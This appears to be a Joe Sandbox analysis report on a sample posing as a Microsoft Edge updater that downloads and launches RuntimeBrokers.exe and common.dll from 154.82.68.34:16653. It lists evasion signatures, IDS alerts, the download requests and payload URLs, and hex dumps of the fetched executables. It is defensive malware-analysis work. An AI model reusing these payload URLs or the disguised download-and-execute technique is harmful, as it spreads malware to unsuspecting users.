Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MicrosoftEdgeUpdateSetup.exe

Overview

General Information

Sample name:MicrosoftEdgeUpdateSetup.exe
Analysis ID:1579412
MD5:e0596bfb4ce5773932f2c2047e2de77b
SHA1:41120d88d333fad440718a288f29920f040cd832
SHA256:74a4f68219998688ddd9e14d4a10c6c451cbd77f91f7ea0e27f8dd17f70eeaa9
Tags:exeuser-smica83
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Found evasive API chain checking for user administrative privileges
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • MicrosoftEdgeUpdateSetup.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe" MD5: E0596BFB4CE5773932F2C2047E2DE77B)
    • RuntimeBrokers.exe (PID: 4460 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe" MD5: 70E1B494A6097723A9B8BBE2CF41CF0A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T08:37:03.561689+010020220501A Network Trojan was detected154.82.68.3416653192.168.2.449730TCP
2024-12-22T08:37:08.199060+010020220501A Network Trojan was detected154.82.68.3416653192.168.2.449730TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T08:37:04.046985+010020220511A Network Trojan was detected154.82.68.3416653192.168.2.449730TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C6642 CryptReleaseContext,1_2_6C0C6642
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C6688 CryptReleaseContext,1_2_6C0C6688
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C60AA __EH_prolog3_GS,CryptAcquireContextW,GetLastError,1_2_6C0C60AA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C157C31 ?VerifyCertInfo@Sys_wrapper@common@ierd_tgp@@SA_NPB_W@Z,__EH_prolog3_GS,memset,memset,lstrcpyW,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringA,LocalAlloc,CertGetNameStringW,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,LocalFree,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,LocalFree,CertFreeCertificateContext,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,CertCloseStore,CryptMsgClose,1_2_6C157C31
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_6C0C381C ?SymEnCrypt@CSymmetryString@ieg_common@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0PAV34@@Z,?qq_symmetry_encrypt3_len@@YAHH@Z,?oi_symmetry_encrypt2@@YAXPBEH0PAEPAH@Z,1_2_6C0C381C
Source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_da8f9787-6
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MicrosoftEdgeUpdateSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\ci_dev\wegame_client\build\bin\Release\tcls_core.pdb source: RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: mi_exe_stub.pdb source: MicrosoftEdgeUpdateSetup.exe
Source: Binary string: D:\ci_dev\wegame_client\build\lib\Release\common.pdb source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: #lkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0016207E
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_0016231F FindFirstFileExW,GetSystemTimeAsFileTime,FindNextFileW,FindClose,0_2_0016231F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00484A62 FindFirstFileW,MoveFileExW,CopyFileW,FindNextFileW,FindClose,1_2_00484A62
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_0046CDBA FindFirstFileW,_wcsrchr,_wcsrchr,DeleteFileW,FindNextFileW,FindClose,1_2_0046CDBA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exeCode function: 1_2_00468440 GetLogicalDriveStringsW,QueryDosDeviceW,1_2_00468440

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 154.82.68.34:16653 -> 192.168.2.4:49730
Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 154.82.68.34:16653 -> 192.168.2.4:49730
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknownNetwork traffic detected: HTTP traffic on port 16653 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknownNetwork traffic detected: HTTP traffic on port 16653 -> 49730
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit,0_2_00166690
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 154.82.68.34:16653
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 134.122.134.93:8852
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 22 Dec 2024 07:37:06 GMTContent-Type: application/octet-streamContent-Length: 1770080Last-Modified: Wed, 18 Dec 2024 05:31:28 GMTConnection: keep-aliveETag: "67625e30-1b0260"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d f6 f8 d8 c9 97 96 8b c9 97 96 8b c9 97 96 8b 7d 0b 67 8b db 97 96 8b 7d 0b 65 8b 74 97 96 8b 7d 0b 64 8b d7 97 96 8b a6 e1 3c 8b ca 97 96 8b a3 ff 93 8a c8 97 96 8b a3 ff 92 8a d9 97 96 8b 57 37 51 8b cf 97 96 8b 9b ff 95 8a d3 97 96 8b 9b ff 93 8a 88 97 96 8b 9b ff 92 8a ea 97 96 8b c0 ef 15 8b ca 97 96 8b 6a fe 97 8a cb 97 96 8b 6a fe 9f 8a ca 97 96 8b c0 ef 05 8b de 97 96 8b c9 97 97 8b cd 96 96 8b 6a fe 93 8a e8 97 96 8b 6a fe 69 8b c8 97 96 8b c9 97 01 8b c8 97 96 8b 6a fe 94 8a c8 97 96 8b 52 69 63 68 c9 97 96 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 31 fe 4e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 10 00 cc 12 00 00 5e 08 00 00 00 00 00 d8 ef 0a 00 00 10 00 00 00 e0 12 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 1b 00 00 04 00 00 21 25 1b 00 02 00 00 81 c0 c6 2d 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 49 17 00 04 01 00 00 00 a0 18 00 a0 aa 02 00 00 00 00 00 00 00 00 00 00 da 1a 00 60 28 00 00 00 00 00 00 00 00 00 00 e0 7f 15 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 80 15 00 18 00 00 00 38 80 15 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 12 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c ca 12 00 00 10 00 00 00 cc 12 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 81 04 00 00 e0 12 00 00 82 04 00 00 d0 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 2f 01 00 00 70 17 00 00 dc 00 00 00 52 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 aa 02 00 00 a0 18 00 00 ac 02 00 00 2e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 22 Dec 2024 07:37:11 GMTContent-Type: application/octet-streamContent-Length: 3925088Last-Modified: Wed, 18 Dec 2024 05:31:28 GMTConnection: keep-aliveETag: "67625e30-3be460"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 b7 47 a4 05 d6 29 f7 05 d6 29 f7 05 d6 29 f7 94 bf 2d f6 9f d4 29 f7 6a a0 83 f7 06 d6 29 f7 6f be 2d f6 15 d6 29 f7 6f be 2c f6 00 d6 29 f7 9b 76 ee f7 0f d6 29 f7 57 be 2d f6 09 d6 29 f7 57 be 2a f6 15 d6 29 f7 57 be 2c f6 27 d6 29 f7 57 be 28 f6 01 d6 29 f7 0c ae aa f7 0d d6 29 f7 95 bf 2c f6 51 d6 29 f7 a6 bf 21 f6 0c d6 29 f7 0c ae ba f7 3a d6 29 f7 05 d6 28 f7 57 d5 29 f7 a6 bf 2d f6 04 d6 29 f7 a6 bf 2c f6 67 d6 29 f7 a6 bf 29 f6 04 d6 29 f7 a6 bf d6 f7 04 d6 29 f7 05 d6 be f7 04 d6 29 f7 a6 bf 2b f6 04 d6 29 f7 52 69 63 68 05 d6 29 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 fd 4e 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 10 00 be 29 00 00 64 12 00 00 00 00 00 fa 45 12 00 00 10 00 00 00 d0 29 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 3c 00 00 04 00 00 c6 fe 3b 00 03 00 40 01 60 e3 16 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 2e 36 00 d4 76 01 00 d4 a4 37 00 a8 02 00 00 00 00 3a 00 d8 1a 00 00 00 00 00 00 00 00 00 00 00 bc 3b 00 60 28 00 00 00 20 3a 00 cc 31 02 00 b0 ea 32 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 eb 32 00 18 00 00 00 08 eb 32 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 29 00 90 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc bc 29 00 00 10 00 00 00 be 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f4 32 0e 00 00 d0 29 00 00 34 0e 00 00 c2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 de 01 00 00 10 38 00 00 76 01 00 00 f6 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 51 4d 47 75 69 64 00 14 00 00 00 00 f0 39 00 00 02 00 00 00 6c 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 d0 2e 72 73 72 63 00 00 00 d8 1a 00 00 00 00 3a 00 00 1c 00 00 00 6e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 31 02 00 00 20 3a 00 00 32 02 00 00 8a 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
Source: global trafficHTTP traffic detected: GET /RuntimeBrokers.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /common.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknownTCP traffic detected without corresponding DNS query: 154.82.68.34
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exeCode function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit,0_2_00166690
Source: global trafficHTTP traffic detected: GET /RuntimeBrokers.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /common.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34/
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34/32
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe)Ce
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe2j
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exeC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exea
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exeg
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dll
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dllAppData
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dllFt
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dllS
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828404553.0000000002C4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dllSSC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dlldllLMEMP
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dlloC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.82.68.34:16653/common.dllr
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
